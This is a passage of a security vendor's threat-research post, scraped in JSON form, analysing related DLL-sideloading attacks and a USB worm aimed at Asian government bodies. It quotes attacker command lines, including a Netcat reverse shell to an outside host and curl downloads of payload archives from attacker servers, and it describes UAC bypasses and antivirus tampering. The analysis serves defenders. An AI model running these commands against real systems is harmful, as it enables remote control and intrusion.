{"id":20534,"date":"2022-11-03T05:20:52","date_gmt":"2022-11-03T13:20:52","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2022\/11\/03\/news-14267\/"},"modified":"2022-11-03T05:20:52","modified_gmt":"2022-11-03T13:20:52","slug":"news-14267","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2022\/11\/03\/news-14267\/","title":{"rendered":"Family Tree: Related DLL-Sideloading Cases Bear Strange Fruit"},"content":{"rendered":"<p><strong>Credit to Author: Gabor Szappanos| Date: Thu, 03 Nov 2022 12:03:13 +0000<\/strong><\/p>\n<div class=\"entry-content lg:prose-lg mx-auto prose max-w-4xl\">\n<p>We have observed multiple attacks targeting government organizations in Asia, all involving DLL sideloading \u2013 historically a favorite technique of China-based APT groups &#8212; <a href=\"https:\/\/news-sophos.go-vip.net\/wp-content\/uploads\/sites\/2\/2013\/05\/sophosszappanosplugxmalwarefactoryversion6-rev3.pdf\">as far back as 2013<\/a> and <a href=\"https:\/\/news.sophos.com\/en-us\/2020\/11\/04\/a-new-apt-uses-dll-side-loads-to-killlsomeone\/\">as recently as 2020<\/a>. In this article, we look at the evidence that connects five of them, showing how threat actors base their attacks on well-known, effective techniques, adding complexity and variation over time. Understanding how cases are related helps defenders (and customers) think about not just who\u2019s doing the attacking, but about what kind of threats may be afoot \u2013 and, naturally, how to prioritize analysis and defense for best results.<\/p>\n<p>In the most interesting of the five cases, a USB worm infected organizations in Southeast Asia. 
This worm copies everything it finds in specific directories when replicating itself, including components of other APT attacks by <a href=\"https:\/\/www.crowdstrike.com\/blog\/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda\/\">Mustang Panda<\/a> and <a href=\"https:\/\/securelist.com\/apt-luminousmoth\/103332\/\">LuminousMoth<\/a>. We don\u2019t have any evidence that the three APTs are linked, and we also know that multiple USB worms, when infecting systems simultaneously, may inadvertently combine their files. \u00a0(This is similar to <a href=\"https:\/\/en.wikipedia.org\/wiki\/Macro_and_security#%22Mating%22_macro_viruses\">macro virus mating<\/a>, a phenomenon identified <a href=\"https:\/\/www.sciencedirect.com\/science\/article\/pii\/S016740489788131X\">over twenty-five years ago<\/a>.)<\/p>\n<p>The case involving the USB worm has significant overlap with the other four cases we observed, including loader DLLs using the same kind of code flow obfuscation and identical loader shellcode. We can\u2019t be sure that it\u2019s the same threat actor behind both the USB worm case and the other attacks \u2013 it may be different threat actors with access to the same tooling \u2013 but the similarities are compelling.<\/p>\n<p>We\u2019ll take a deep dive into all five cases, further detailing the infection timeline of the USB-worm attack in an appendix. We\u2019ll spotlight a piece of shell code that seems to be the common thread in all five cases, and then dig into extended step-by-step breakdowns of seven scenarios we associate with these cases. 
We\u2019ll close with indicators of compromise associated with these cases, which we will also make available on our GitHub.<\/p>\n<p>Before all that, though, it\u2019s worth briefly defining what DLL sideloading is, as it\u2019s often confused with a similar attack called DLL preloading.<\/p>\n<h2>About DLL sideloading and preloading<\/h2>\n<p>DLL sideloading and preloading (sometimes known as search-order hijacking) are both attacks that hijack execution flow, although there is a subtle distinction between them.<\/p>\n<p><strong>DLL preloading (AKA search order hijacking) \u2013 <\/strong><a href=\"https:\/\/attack.mitre.org\/techniques\/T1574\/001\/\"><strong>T1574\/001<\/strong><\/a><\/p>\n<ul>\n<li>An attacker plants a malicious DLL in a directory that will be searched by a pre-existing application before the location of a legitimate library (based on the <a href=\"https:\/\/docs.microsoft.com\/en-us\/windows\/win32\/dlls\/dynamic-link-library-search-order\">default Windows search order)<\/a>.<\/li>\n<li>For example, if a legitimate application has to load <em>dll<\/em> and doesn\u2019t specify a location, it will search the current directory first, then other directories as per the Windows search order.<\/li>\n<li>If an attacker has write permissions to a directory in the search order list, they can plant a malicious DLL called <em>dll <\/em>in that directory<em>,<\/em> which the application will then load (assuming the legitimate DLL has not already been loaded into memory, and wasn\u2019t found in any previous search locations).<\/li>\n<li>The attacker then waits for the pre-existing legitimate application to be executed, or forces this process (e.g., by rebooting the machine).<\/li>\n<\/ul>\n<p><strong>DLL sideloading \u2013 <\/strong><a href=\"https:\/\/attack.mitre.org\/techniques\/T1574\/002\/\"><strong>T1574\/002<\/strong><\/a><\/p>\n<ul>\n<li>As above, except the attacker plants and invokes a legitimate application that loads the malicious DLL. 
This allows the attacker to take advantage of the trust the system already has in the application.<\/li>\n<li>This technique has been used by various threat actors, <a href=\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/revil-ransomware-uses-dll-sideloading\/\">including REvil<\/a>.<\/li>\n<\/ul>\n<h2>User cases<\/h2>\n<p>A number of user reports led us to initially spot the threat actor\u2019s activities. We\u2019ll start with the most basic case and progress to the four more complex examples.<\/p>\n<h3>Case 1: Basic Bad Behavior<\/h3>\n<p>This was the case that first drew our attention to the malicious server 91.245.253[.]52, which appears repeatedly in these attacks.<\/p>\n<p>This case came to light thanks to a stager alert (DynamicShellcode) received from a customer. The malicious payload (SSCE5532.dll) was executed via the command prompt, as shown in the following process trace:<\/p>\n<pre>1\u00a0 C:WindowsSysWOW64rundll32.exe [5624]  rundll32.exe\u00a0 SSCE5532.dll RunMain  2\u00a0 C:WindowsSystem32rundll32.exe [7864]  rundll32.exe\u00a0 SSCE5532.dll RunMain  3\u00a0 C:WindowsSystem32cmd.exe [3288]  4\u00a0 C:Windowsexplorer.exe [4628]<\/pre>\n<p>The threat actor placed the malicious DLL on the desktop. It executed shellcode for a standard Metasploit (or, possibly, Cobalt Strike) reverse HTTP shell, connecting to the following attacker-controlled server:<\/p>\n<pre>91.245.253.52:6060\/rKVI<\/pre>\n<h3>Case 2: Double Trouble<\/h3>\n<p>We started looking for other cases involving the 91.245.253[.]52 server, and we found them. 
This one involves <em>two<\/em> DLL sideloading attacks.<\/p>\n<h4>2.1: First sideloading attack<\/h4>\n<p>The initial infection consists of ciscocollabhost.exe, a clean and digitally signed Cisco application that, on execution, loads ciscosparklauncher.dll, a malicious DLL.<\/p>\n<p>Our telemetry indicates that ciscosparklauncher.dll is a loader and that the payload could be a file named 2831329086.inf, located in the same directory.<\/p>\n<p>Next, a password-protected RAR archive is downloaded from a distribution server and unpacked, as shown in these command lines:<\/p>\n<pre>http:\/\/5.252.178.162\/IJOINOIS\/c.rar -o   C:\\users\\public\\libraries\\c.rar\",  \u00a0 \u00a0 \"commandLine\" : \"c:\\windows\\system32\\cmd.exe \/C   c:\\progra~1\\winrar\\rar.exe x -hpNONI*(uy23oninjfoisjnsofnsc   C:\\users\\public\\libraries\\c.rar\u00a0 C:\\Users\\Public\\libraries\"<\/pre>\n<p>The RAR archive contains the following files:<\/p>\n<pre>86f7661039a0855be8d6d1cb55391f398932e80c\u00a0 googleupdate.exe (clean VLC EXE)  ed67a11646c1b28bc856941743331acb47f1b7b4\u00a0 goopdate.ja (encrypted implant)  e5be6f621c4a10372837baf795a37b1caa942d23\u00a0 libvlc.dll (malicious loader)  b2eb8516ab136aa44106c13cc859dcee77d1bc1f\u00a0 loader.ja (encrypted implant)  d90355d2a53b662c1d3fe7ab4430d3955a54f73f\u00a0 time.sig (encrypted config)<\/pre>\n<h4>2.2: Second sideloading attack<\/h4>\n<p>Next, the executable googleupdate.exe (which, despite its name, has nothing to do with Google; it\u2019s a clean, digitally signed VLC Media Player application) in c.rar is used to sideload libvlc.dll, a malicious loader that loads the payloads from the encrypted implants in the archive.<\/p>\n<p>Conveniently, those implants write out detailed debug logs on their progress:<\/p>\n<p>p1-p11: privilege escalation progress messages<br \/> x1-x4: module execution progress messages<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image1.png\"><img decoding=\"async\" 
loading=\"lazy\" class=\"alignnone size-full wp-image-87827\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image1.png\" alt=\"A debugger screenshot showing events being logged\" width=\"640\" height=\"648\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image1.png 654w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image1.png?resize=296,300 296w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image1.png?resize=32,32 32w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image1.png?resize=50,50 50w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image1.png?resize=64,64 64w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image1.png?resize=96,96 96w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/a><\/p>\n<p><em>Figure 1: Events conveniently logged<\/em><\/p>\n<p>Once this second sideloading attack is complete, the malware connects to the stager server, this time over port 443.<\/p>\n<h3>Case 3: Something Extra<\/h3>\n<p>This attack was detected by Sophos\u2019 HeapHeapProtect dynamic-shellcode mitigation, which prevents code running in heap space from adding arbitrary code into the memory space of the original application, and similarly prevents lateral code injection into other applications (and flags the attempt). As in the previous case, this attack featured two sideloading attempts. In fact, the first was exactly the same as seen in the previous two cases.<\/p>\n<h4>3.1: First sideloading attack<\/h4>\n<p>The first attack featured the same executable and malicious DLL as we saw in the other cases, and we once again observed a connection to 91.245.253[.]52. 
Next came the downloading and unpacking of a password-protected RAR file, using a different distribution server:<\/p>\n<pre>\u00a0 \u00a0 \u00a0 \u00a0 \u00a0\"commandLine\" : \"curl\u00a0 -k   http:\/\/103.253.72.116\/akjsdnfkjsnjfekse\/walk.rar -o   C:\\users\\public\\libraries\\walk.rar\",  \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \"commandLine\" : \"C:\\Progra~1\\WinRAR\\Rar.exe\u00a0 x -  hplic\\down443 C:\\users\\public\\libraries\\walk.rar   C:\\Users\\Public\\Downloads\\\",<\/pre>\n<p>The walk.rar archive contained six files: three encrypted implants and an encrypted config (all with a PLG extension), a clean executable (Netsky.exe, a Razer Chromium Render Process), and a malicious DLL (RzLog4CPP_Logger.dll).<\/p>\n<h4>3.2: Second sideloading attack<\/h4>\n<p>The second attack used the loader Netsky.exe and the malicious RzLog4CPP_Logger.dll from the first part of the attack, which decrypts and loads alloc.plg, one of the encrypted implants. In turn, this implant loads the others.<\/p>\n<p>We also noted that the attacker executed 2.exe, with the path of NetSky.exe as an argument. The function of this executable is currently unclear.<\/p>\n<h3>Case 4: The Worm Circus<\/h3>\n<p>We found this case by running a <a href=\"https:\/\/support.virustotal.com\/hc\/en-us\/articles\/360001293377-Retrohunt\">VirusTotal RetroHunt<\/a> using the characteristics of the sideloading DLLs we spotted in the previous cases. Of the five cases we\u2019ll cover, this could be considered the most complex, and we will return to it later in this article when we do a deeper analysis of infection timelines for these cases. It includes three sideloading efforts.<\/p>\n<p>We noted a significant code overlap (especially in the loader shellcode) between this case and the other sideloading cases discussed so far, so we think this was also run by the same threat actor. However, the payload turned out to be totally different: a USB worm. 
We\u2019re uncertain as to the purpose of this worm. It collects all files from the root of the USB drives and copies them as the infection spreads to other devices. It could be a deliberate data exfiltration method, or just an unwanted side effect of the propagation process.<\/p>\n<p>In this case, the threat actor used a clean usbconfig.exe executable using multiple names (disk_watch.exe, usb drive.exe, and Removable Disk.exe); an encrypted implant (usb.ini); and u2ec.dll, a malicious loader for the implant.<\/p>\n<h4>4.1: USB worm mating<\/h4>\n<p>In Case 4, we observed sideloading components from two other APT groups &#8212; <a href=\"https:\/\/blog.talosintelligence.com\/2022\/05\/mustang-panda-targets-europe.html\">Mustang Panda<\/a> and <a href=\"https:\/\/securelist.com\/apt-luminousmoth\/103332\/\">LuminousMoth<\/a> \u2013 in the same directory as files from the original threat actor. We think that the presence of these two additional APTs is collateral damage during the file-collection process, rather than an indication of collusion.<\/p>\n<p>The files corresponding to the sideloading attack included disk_watch.exe and u2ec.dll. \u00a0Files corresponding to Mustang Panda included rzlog4cpp.dll (a Mustang Panda reverse shell, not to be confused with the RzLog4CPP_Logger.dll we saw in Case 3), wuwebv.exe (a clean but renamed copy of Netcat), and two DLLs that were clean dependencies of Netcat.<\/p>\n<p>The rzlog4cpp.dll establishes a reverse shell by invoking the Netcat component with the following command line:<\/p>\n<pre>cmd.exe \/C wuwebv.exe -t -e c:windowssystem32cmd.exe   closed.theworkpc.com 80<\/pre>\n<p>Files corresponding to LuminousMoth included msbuild.exe, a clean Silverlight launcher; and version.dll, a malicious DLL. The latter file is also a USB worm, operating in a similar way as the usb.ini implant mentioned previously in Case 4. 
It is associated with LuminousMoth APT activities <a href=\"https:\/\/www.kaspersky.com\/about\/press-releases\/2021_rare-mass-advanced-threat-campaign-targets-more-than-a-thousand-users-in-southeast-asia\">seen<\/a> in 2021.<\/p>\n<p>We identified one other component, a clean copy of Microsoft\u2019s WinWord.exe. Its role is unknown, although Kaspersky researchers have speculated that it may have been used to sideload a malicious DLL, wwlib.dll.<\/p>\n<h3>Case 5: Triple Threat<\/h3>\n<p>The last case we\u2019ll examine involved three different sideloading attacks, as Case 4 did (though no worm was detected). We covered the first two attacks in Case 3, although we noticed a slight difference this time. The \u201cTriple Threat\u201d also has echoes of Case 2, as you\u2019ll see.<\/p>\n<h4>5.1: First sideloading attack<\/h4>\n<p>As in Case 2, the threat actor used ciscocollabhost.exe and ciscosparklauncher.dll, and downloaded, unpacked, and executed c.rar from 5.252.178[.]162\/IJOINOIS.<\/p>\n<p>However, this time the threat actor also downloaded and executed an additional password-protected RAR archive, v1.rar, from 103.253.72[.]116\/_akjsdnfkjsnjfekse. (We saw that IP address already, in Case 3.) v1.rar contains clean copies of smstore.exe and msvcrt.dll (both legitimate Microsoft files) and SYSMSRV.dll, a malicious DLL.<\/p>\n<h4>5.2: Second sideloading attack<\/h4>\n<p>This attack used googleupdate.exe (the clean VLC executable) and libvlc.dll, a malicious DLL, as described in Case 2.<\/p>\n<pre>c:userspubliclibrariesoutgoogleupdate.exe : \u00a0  6f924de3f160984740fbac66cf9546125330fc00f4f5d2dbf05601d9d930b7d9  c:userspubliclibrariesoutlibvlc.dll :   2fd75763307c5aec5603adc6d02a7c5f34d605a0989e856001b4ae2eef2b4327<\/pre>\n<h4>5.3: Third sideloading attack<\/h4>\n<p>This attack used the same files from v1.rar, although the threat actor also used a UAC bypass trick to execute commands \u2013 including an unidentified file, 3.exe. 
(We\u2019ll detail this bypass trick below as Scenario 5.) As with \u201c2.exe\u201d in Case 3, the purpose of this executable is unknown.<\/p>\n<h2>The common thread: Loader shellcode<\/h2>\n<p>We\u2019ve laid out five cases; let\u2019s look at the common threads.<\/p>\n<p>First, the malicious server 91.245.253[.]52 \u2013 our first clue in the investigation, as noted in Case 1 &#8212; made an appearance in every case. Other interesting traces are shown in the chart below.<\/p>\n<p><em>Table 1: Various traces and IoCs noted among the five DLL sideloading cases<\/em><\/p>\n<p>More significantly, when the sideloader DLL decrypts the plugin, it continues execution by jumping to the first byte of the file. The file content of the decrypted plugin starts with a short PE loader shellcode, which loads the encrypted plugin DLL. This loader shellcode is the same in all seven scenarios described in the following sections, which establishes a strong connection among them.<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image2.png\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone wp-image-87828 size-full\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image2.png\" alt=\"Screenshot of a disassembly showing the loader shellcode\" width=\"524\" height=\"734\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image2.png 524w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image2.png?resize=214,300 214w\" sizes=\"auto, (max-width: 524px) 100vw, 524px\" \/><\/a><\/p>\n<p><em>Figure 2: The shared loader shellcode<\/em><\/p>\n<p>Similar to <a href=\"https:\/\/www.sophos.com\/en-us\/medialibrary\/pdfs\/technical%20papers\/plugx-thenextgeneration.pdf\">PlugX loaders<\/a>, this shellcode loader overwrites the first 0x1000 bytes of the decrypted and loaded plugin DLL with zero bytes.<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image3.png\"><img decoding=\"async\" 
loading=\"lazy\" class=\"alignnone size-full wp-image-87829\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image3.png\" alt=\"Screenshot of a disassembly showing a loop\" width=\"640\" height=\"625\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image3.png 866w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image3.png?resize=300,293 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image3.png?resize=768,750 768w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image3.png?resize=32,32 32w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image3.png?resize=50,50 50w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image3.png?resize=64,64 64w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/a><\/p>\n<p><em>Figure 3: The loop that fills the first 0x1000 bytes with zero bytes<\/em><\/p>\n<h2>Under the hood: Five cases, seven scenarios<\/h2>\n<p>Moving on, we\u2019ll dissect some of the more interesting activities we spotted during analysis. We\u2019ll dissect one scenario from each of our five cases, and look in addition at two earlier finds that appear to be related to these cases. We should note that normally, we\u2019d expect to see one scenario (clean loader + malicious loader + plugins) per case, but a couple of these cases literally doubled up. (Why they would do that is left as a conjecture for the reader.) For ease of reference, we\u2019ll letter our scenarios \u2013 A, B, C, D, E \u2013 and identify the case to which it is related.<\/p>\n<p>We discovered the two \u201cextra\u201d scenarios \u2013 F, G &#8212; by taking the information we had from our five cases and looking beyond our own data to see what other defenders might have already discovered but not yet flagged as part of a larger threat. 
They\u2019re presented here to show how else these attacks might present to threat hunters, and to give some indication of just how long-running the threat might be.<\/p>\n<p>Another of the interesting variations we found in this set of cases is that similar or identical configuration data is stored in multiple plugins. We\u2019ll show this in detailed analysis of the specific plugins.<\/p>\n<h3>From Case 1: Scenario A, the initial loader<\/h3>\n<p>This was the initial infection, which consisted of the following components:<\/p>\n<pre>c:userspubliclibrariesciscocollabhost.exe :   7b301cea1feff0add8de512a93ed7bc1b8330caf0c3a6f1585f9887b88db8efb   (clean loader)  c:userspubliclibrariesciscosparklauncher.dll :   a73053f5410de74c8689d5a0da0df72adaa28055562626003d1b446c754d79e6   (sideloader DLL)  c:userspubliclibraries2831329086.inf (payload)<\/pre>\n<h4>Implants<\/h4>\n<p>The implant had the name 2831329086.inf, and was placed in the same directory as the sideloader DLL. We don\u2019t have the implant, so we can only guess at its behavior based on the activity logs.<\/p>\n<h3>From Case 2: Scenario B, the \u201ccool client\u201d<\/h3>\n<p>The files belonging to this scenario were found in the downloaded c.rar described in Case 2.<\/p>\n<p>This campaign was dubbed \u201cCool Client\u201d by its developers, based on leftover development information in the components.<\/p>\n<h4>Sideloader DLLs<\/h4>\n<h4>libvlc.dll<\/h4>\n<p>Compile time: 2021-May-10 19:40:05<\/p>\n<p>PDB path: G:project\u6728\u9a6c<strong>CoolClient<\/strong>hijack_exportlibvlcReleaselibvlc.pdb<\/p>\n<p>PDB File Name : G:project\u6728\u9a6cCoolClienthijack_exportlibvlcRelease<strong>libvlc.pdb<\/strong><br \/> (Translation of the Chinese text: <em>Trojan horse<\/em>)<\/p>\n<p>Most of the libvlc exports are dummy (RET) functions that immediately exit &#8212; except for libvlc_new, which is the main function.<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image4.png\"><img 
decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-87830\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image4.png\" alt=\"Screenshot of a disassembly showing the libvlc_new function\" width=\"640\" height=\"509\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image4.png 988w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image4.png?resize=300,239 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image4.png?resize=768,611 768w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/a><\/p>\n<p><em>Figure 4: libvlc_new has a few things going on, in fact<\/em><\/p>\n<p>The DLL has a default config structure. The config data is stored in a memory region. First it is initialized with the hardcoded config, and then this region is overwritten with whatever the decrypted content of time.sig isThe first value looks like an ID string for the config structure, the second one is an encryption key, and the third one should be the C2 address.<\/p>\n<pre>cfg_find_tag  e4adbd50cf4e608d7cd3cf16022831ab  192.168.211.1<\/pre>\n<p>These are default values, as indicated by the RFC 1918 IP address. To update with the real values, the process loads time.sig and decrypts the config info from it, overriding the default configuration with the target system\u2019s actual configuration. During this process it:<\/p>\n<ul>\n<li>Replaces the default values in the memory with the new ones<\/li>\n<li>Loads the implant file c:programdataGoogleUpdateUpdateTime.ja<\/li>\n<li>Installs itself as a service named gupdaten<\/li>\n<li>Looks for the presence of c:windowssystem32clb.dll. 
If the file is not found, the process terminates<\/li>\n<li>If c:programdataGoogleUpdateloader.ja does exist, the process decrypts and executes loader.ja<\/li>\n<li>loader.ja is injected into the winver.exe process (process hollowing; we\u2019ll have more to say about this technique in Scenario 3)<\/li>\n<li>In addition to the default config, it contains the internal IP address 192.168.211.13. The purpose is unclear at this time.<\/li>\n<\/ul>\n<h4>Implants<\/h4>\n<p>These are the encrypted modules that are loaded and executed during the infection process.<\/p>\n<h4>Loader.ja<\/h4>\n<p>Compile time: 2021-May-31 01:23:24<\/p>\n<p>It appears to contain default config data, similar to libvlc.dll, and is likewise overwritten via time.sig<\/p>\n<p>Relevant strings from the embedded config structure:<\/p>\n<pre>cfg_find_tag  mark  group  192.168.211.1  e4adbd50cf4e608d7cd3cf16022831ab<\/pre>\n<p>Another internal IP address, 192.168.211.13, is stored elsewhere.<\/p>\n<p>The implant employs a <a href=\"https:\/\/gist.github.com\/api0cradle\/d4aaef39db0d845627d819b2b6b30512\">UAC bypass using the CMSTPLUA COM interface<\/a>, and\u00a0injects the created process into winver.exe. 
Processes are created for these files:<\/p>\n<pre>c:programdataGoogleUpdategoopdate.ja  c:programdataGoogleUpdatesession.ja<\/pre>\n<p>This sequence:<\/p>\n<ol>\n<li>Stops the avp.exe process (avp.exe is the core component of Kaspersky\u2019s antivirus solution; this is an attempt to evade detection)<\/li>\n<li>Creates a registry autorun key: HKCUSoftwareMicrosoftWindowsCurrentVersionRungoopdate<\/li>\n<li>Adds a service called gupdaten<\/li>\n<\/ol>\n<h4>goopdate.ja<\/h4>\n<p>Compile time: 2021-06-03 01:28:52<\/p>\n<p>PDB path:<\/p>\n<p>PDB File Name: G:project\u6728\u9a6cCoolClientmainReleasemain.pdb<br \/> (Translation of the Chinese text: <em>Trojan horse<\/em>)<\/p>\n<p>This file refers to several source files in its code, including:<\/p>\n<pre>g:project..coolclientmainmainckernelmanager.cpp  g:project..coolclientmainmaincmyudpclient.cpp  g:project..coolclientmainmaincmytcpclient.cpp<\/pre>\n<p>As with previous examples, this implant contains default config data:<\/p>\n<pre>cfg_find_tag  mark  group  e4adbd50cf4e608d7cd3cf16022831ab  192.168.211.153<\/pre>\n<p>as well as the internal IP address 192.168.211.13.<\/p>\n<p>This plugin registers the clean loader executable for autostart as a service. 
(As flagged above, this is a service claiming to be Google Update, but is actually a VLC media player executable.)<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image5.png\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-87831\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image5.png\" alt=\"Screenshot of the Windows registry editor, showing the gupdaten service created as a key\" width=\"640\" height=\"172\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image5.png 1228w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image5.png?resize=300,81 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image5.png?resize=768,206 768w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image5.png?resize=1024,275 1024w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/a><\/p>\n<p><em>Figure 5: The new \u201cservice\u201d gupdaten<\/em><\/p>\n<h4>session.ja and UpdateTime.ja<\/h4>\n<p>We didn\u2019t obtain these implants. 
All we know is that loader.ja refers to them and would load them if they existed.<\/p>\n<h4>time.sig<\/h4>\n<p>This file contains encrypted config information, as shown in Figure 6:<\/p>\n<pre class=\"Codesample\">cfg_find_tag  None  machinetimeer  www.machinetimeer.com  www.machinetimeer.com  192.168.211.153  192.168.211.13  tests5  123456<\/pre>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image6.png\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-87832\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image6.png\" alt=\"Hex dump of the config file, showing machinetimeer and machinetimeer.com\" width=\"640\" height=\"318\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image6.png 682w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image6.png?resize=300,149 300w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/a><\/p>\n<p><em>Figure 6: A look at the hex related to machinetimeer<\/em><\/p>\n<h3>From Case 3: Scenario C, the VTCP gambit<\/h3>\n<p>Code analysis shows that this scenario is built around vtcp.dll (the entirety of which is actually embedded into the main implant; it\u2019s not just that the source code is linked into the plugin!) from the Trochilus RAT collection. 
These files were in the downloaded walk.rar archive.<\/p>\n<h4>Sideloader DLLs<\/h4>\n<h4>RzLog4CPP_Logger.dll<\/h4>\n<p>Compile time: 2021-Aug-19 21:40:13<\/p>\n<p>This contains a digital signature, seemingly from Google LLC (but really another self-signed fake):<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image7.png\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-87833\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image7.png\" alt=\"Screenshot of digital signature details\" width=\"640\" height=\"705\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image7.png 750w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image7.png?resize=272,300 272w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/a><\/p>\n<p><em>Figure 7: A certificate that\u2019s not what it claims to be<\/em><\/p>\n<p>Thumbprint:\u00a0\u00a0\u00a0 747EC25FDC3710E46D69135FAE8797718B967E25<br \/> Algorithm:\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 sha256RSA<br \/> Valid from:\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 5:52 AM 5\/10\/2021<br \/> Valid to:\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 5:52 AM 5\/10\/2023<\/p>\n<p>This uses the same code flow obfuscation as libvlc.dll. 
It loads and decrypts alloc.plg.<\/p>\n<h4>Implants<\/h4>\n<h4>alloc.plg<\/h4>\n<p>Compile time: 2021-Aug-19 22:38:47<\/p>\n<p>Contains an encrypted embedded PE, which has a Chinese PDB string:<\/p>\n<p>Compile time: 2018-Feb-10 19:04:13<br \/> PDB File Name : G:ROOT\u4ee3\u7801\u5de5\u7a0b\u6728\u9a6c\u6280\u5de7\u6536\u96c638dllRelease38dll.pdb<\/p>\n<p>(Translation: G:ROOTCode ProjectTrojanTrick Collection38dllRelease38dll.pdb)<\/p>\n<p>The implant executes wusa.exe (and possibly grabs its process token).<\/p>\n<p>As Microsoft describes it, this creates a new process and its primary thread; the new process runs the specified executable file in the security context of the specified credentials (user, domain, and password). It can optionally load the user profile for a specified user. Abuse of this technique was <a href=\"https:\/\/twitter.com\/vk_intel\/status\/991226679380074496\">previously noted by researcher Vitali Kremez in 2018<\/a> and is associated with the <a href=\"https:\/\/blog.talosintelligence.com\/2016\/09\/tofsee-spam.html\">Tofsee<\/a> plugin-based spambot. 
It is probably a Vault7 fileless AlwaysNotify UAC bypass, similar to <a href=\"https:\/\/gist.github.com\/dezhub\/c0fee68d1e06657a45ec39365362fca7\">this one<\/a>.<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image8.png\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-87834\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image8.png\" alt=\"A disassembly of a UAC bypass function\" width=\"640\" height=\"119\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image8.png 1476w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image8.png?resize=300,56 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image8.png?resize=768,143 768w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image8.png?resize=1024,190 1024w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/a><\/p>\n<p><em>Figure 8: A UAC bypass in action<\/em><\/p>\n<p>username: uac<br \/> domain: is<br \/> password: useless<\/p>\n<p>This hollows free.plg into dllhost.exe. (<a href=\"https:\/\/attack.mitre.org\/techniques\/T1055\/012\/\">Hollowing<\/a>, mentioned also in Scenario 2, is an attack in which a threat actor removes code in an executable, in this case dllhost, and embeds malicious code in order to trick the target machine into running the \u201ctrusted\u201d executable.) Possible command-line parameters, which are passed to the clean loader when executed, include:<\/p>\n<p>passuac<br \/> online<br \/> install<\/p>\n<p>This uses <a href=\"https:\/\/gist.github.com\/api0cradle\/d4aaef39db0d845627d819b2b6b30512\">UAC_Bypass_CMSTPLUA<\/a> and creates a service (InstallSvc) with the command &#8216;C:ProgramDataNetskyNetSky.exe 